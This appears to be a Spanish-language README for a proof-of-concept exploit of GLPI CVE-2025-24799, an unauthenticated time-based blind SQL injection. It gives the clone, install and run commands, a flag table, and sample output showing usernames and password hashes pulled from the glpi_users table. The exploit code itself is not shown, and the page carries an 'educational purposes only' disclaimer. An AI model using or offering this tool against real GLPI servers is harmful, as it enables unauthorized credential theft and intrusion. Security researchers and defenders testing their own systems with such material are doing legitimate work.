
Explota GLPI CVE-2025-24799 mediante inyección SQL ciega basada en tiempo no autenticada para extraer nombres de usuario y hashes de contraseñas de glpi_users para pruebas de seguridad autorizadas.
CVE-2025-24799 es un exploit de prueba de concepto (PoC) dirigido a GLPI.
Este exploit demuestra inyección SQL no autenticada (ciega basada en tiempo) para extraer credenciales de usuario.
Aviso legal: Este PoC es solo con fines educativos. No lo uses en sistemas sin permiso.
glpi_users y las columnas requeridas (name y password)git clone https://github.com/Rosemary1337/CVE-2025-24799.git
cd CVE-2025-24799
pip install -r requirements.txt
Requisitos:
requests,colorama,beautifulsoup4
python3 main.py -u <TARGET_URL>
python3 main.py -u http://target.com/index.php/ajax
| Flag | Descripción | Requerido | Por defecto |
|---|---|---|---|
-u, --url | URL objetivo | Sí | - |
La consola muestra:
[•][✔][✖][i]Ejemplo:
[•] Exploiting CVE-2025-24799...
[✔] Table 'glpi_users' found.
[✔] Required columns verified.
[i] Starting credential extraction...
[+] Credential 1: admin:5f4dcc3b5aa765d61d8327deb882cf99
[+] Credential 2: user:123456
[*] Extraction complete.
Soy un desarrollador activo al que le gusta crear herramientas y compartir conocimiento. Puedes contactarme a través de: